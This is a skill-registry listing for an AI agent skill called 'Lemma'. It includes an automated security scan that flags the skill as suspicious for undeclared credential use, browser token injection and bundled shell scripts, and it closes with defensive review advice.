Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
Lemma
v1.0.0Lemma is an AI operating system platform for business teams. Use this as the single entrypoint when designing, provisioning, testing, or improving Lemma pods...
⭐ 0· 12·0 current·0 all-time
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
medium confidencePurpose & Capability
The skill's name and description match the included module guides and developer workflows, but the repository contains runtime scripts and many guides that assume environment variables (LEMMA_TOKEN, LEMMA_BASE_URL, LEMMA_POD_ID, VITE_LEMMA_* etc.) and browser token injection. The registry metadata claims no required env vars or credentials, which is inconsistent with the guidance in the docs. That mismatch is unexpected and should be justified.
Instruction Scope
SKILL.md routes the agent to many module GUIDE.md files that instruct running CLI commands, starting long-lived shells, curling LEMMA_BASE_URL, injecting auth tokens into browser localStorage, using playwright-cli, and running included shell scripts (e.g., ./modules/lemma-desks/scripts/init-artifact.sh). The instructions therefore reference reading and using workspace env vars and performing network calls — actions outside a strictly read-only documentation skill. The instructions do not declare limits on using tokens or where to send data, and they instruct browser-local token injection which can expose credentials if preview URLs are public.
Install Mechanism
There is no install spec (instruction-only), which is low risk for automatic installs. However, the package includes several shell scripts (notably init-artifact.sh and bundle-artifact.sh). Because the skill bundle contains executable scripts, an agent that follows the guides could run them; the package does not declare what those scripts do in the SKILL.md. Absence of an installation step reduces supply-chain risk, but embedded scripts still deserve inspection before execution.
Credentials
The skill declares no required environment variables or credentials, yet the module guides repeatedly assume the presence of sensitive env vars (LEMMA_TOKEN, LEMMA_BASE_URL, LEMMA_AUTH_URL, LEMMA_POD_ID and VITE_LEMMA_*). The guides also instruct injecting tokens into browser localStorage for testing. Requesting or assuming these secrets without declaring them is disproportionate and opaque — users should confirm which credentials are actually needed and avoid using high-privilege or production tokens for testing.
Persistence & Privilege
Flags show always:false and default autonomous invocation allowed. The skill does not request persistent inclusion or modify other skills. This is normal; no elevated platform privileges are requested in the metadata.
What to consider before installing
This package looks like in-repo product documentation and developer tooling for a Lemma platform, not a small single-purpose helper — treat it as source code you will run. Before installing or executing anything: 1) Inspect the included shell scripts (especially init-artifact.sh and bundle-artifact.sh) to confirm they do only expected, local operations and do not call external URLs you don't trust. 2) Do not paste production LEMMA_TOKEN or other high-privilege credentials into workspace previews or browser localStorage; use a least-privilege, short-lived test token and rotate it afterward. 3) Confirm the required environment variables and their minimum needed scopes — the skill's metadata claims none, but the docs expect many. 4) Run any scripts in an isolated/dev workspace (not on a machine with production secrets) and prefer to dry-run commands or read their contents first. 5) If you need a stronger assurance, provide the full contents of the larger scripts for a deeper review; if those scripts make outbound network calls or upload artifacts, consider the skill suspicious until those calls are audited.Like a lobster shell, security has layers — review code before you run it.
latestvk97a31a09hdxtvb8cx38fp1a4h84h6b6
License
MIT-0
Free to use, modify, and redistribute. No attribution required.